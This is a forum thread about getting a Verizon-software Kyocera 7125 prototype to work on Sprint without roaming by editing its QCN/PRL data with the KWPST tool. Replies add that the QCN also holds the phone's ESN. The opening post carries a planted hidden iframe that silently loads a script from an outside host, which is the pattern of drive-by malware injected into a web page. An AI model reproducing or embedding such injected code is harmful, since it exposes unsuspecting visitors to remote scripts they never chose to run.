+ Reply to Thread

Sprint QCN for non-roaming

First let me say thanks to everyone who has posted such useful information on this forum. Here's my problem: I got my hands on a 7125 Pre-Prod model a few weeks ago, went to the Sprint store and got it activated with my current account. Everything works just beautifully except for a few things.

1. Phone always says it's roaming (I assume it's because I have Verizon specific software in there and the PRL or QCN is not completely correct

2. Short Messages do not come in. VM notification works just fine though.

Going to the 111111 menu and looking at the versions, I see that I have a Verizon specific qcn file which makes perfect sense. I would like to hack that so the phone thinks that this is a Sprint file and get this file somewhere. I realize that this phone is not officially on the Sprint network and this file might not even exist, but maybe there is a way to hack the current qcn file to make it Sprint enabled. Maybe take something from the 6035 model using KWPST. Has anyone had experience with this that they are willing to share?

Thanks for your help.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I believe that the QCN file holds the non-volts memory including the PRL, logo, and your ESN. I don't think you can replace it, but with KWPST you should be able to change virtually anything in it.

It is more then likely just the PRL that is wrong, since otherwise the phone is working, so if you can get the PRL files for Sprint (possibly for another Kyocera phone on their network. I don
    't know if they are manufacturer specific) it should be possible to load it onto your phone with KWPST.

Alan

Re: Sprint QCN for non-roaming

Originally posted by Fantom
    First let me say thanks to everyone who has posted such useful information on this forum. Here's my problem: I got my hands on a 7125 Pre-Prod model a few weeks ago, went to the Sprint store and got it activated with my current account. Everything works just beautifully except for a few things.
    I would sure like to hear more about how that whole interaction at the Sprint store went.
    Please visit my picture site: Robert-O-Rama :)

The KWPST will allow you to change the PRL, I believe there's a version that allows you to edit the PRL. If you can find a Sprint 6035 user that will give your their PRL, you could copy and paste it there.